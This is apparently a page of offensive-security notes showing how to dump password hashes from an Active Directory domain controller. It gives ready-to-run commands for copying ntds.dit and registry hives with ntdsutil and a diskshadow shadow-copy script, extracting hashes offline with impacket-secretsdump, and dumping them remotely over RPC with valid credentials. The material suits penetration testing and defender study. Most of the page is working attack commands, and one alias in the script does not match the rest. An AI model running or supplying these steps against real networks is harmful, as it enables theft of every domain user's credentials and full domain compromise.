Dumping Domain Controller Hashes Locally and Remotely
Dumping NTDS.dit with Active Directory users hashes

No Credentials - ntdsutil

If you have no credentials, but you have access to the DC, it's possible to dump the ntds.dit using a lolbin ntdsutil.exe:
1
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
Copied!
We can see that the ntds.dit and SYSTEM as well as SECURITY registry hives are being dumped to c:\temp:
We can then dump password hashes offline with impacket:
1
[email protected]~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
Copied!

No Credentials - diskshadow

On Windows Server 2008+, we can use diskshadow to grab the ntdis.dit.
Create a shadowdisk.exe script instructing to create a new shadow disk copy of the disk C (where ntds.dit is located in our case) and expose it as drive Z:\
shadow.txt
1
set context persistent nowriters
2
set metadata c:\exfil\metadata.cab
3
add volume c: alias trophy
4
create
5
expose %someAlias% z:
Copied!
...and now execute the following:
1
mkdir c:\exfil
2
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
3
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
Copied!
Below shows the ntds.dit got etracted and placed into our c:\exfil folder:
Inside interactive diskshadow utility, clean up the shadow volume:
1
diskshadow.exe
2
> delete shadows volume trophy
3
> reset
Copied!

With Credentials

If you have credentials for an account that can log on to the DC, it's possible to dump hashes from NTDS.dit remotely via RPC protocol with impacket:
1
impacket-secretsdump -just-dc-ntlm offense/[email protected]
Copied!

References

Attack Methods for Gaining Domain Admin Rights in Active Directory
Active Directory Security
https://www.trustwave.com/Resources/SpiderLabs-Blog/Tutorial-for-NTDS-goodness-(VSSADMIN,-WMIS,-NTDS-dit,-SYSTEM)/
www.trustwave.com
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction
bohops
Last modified 1yr ago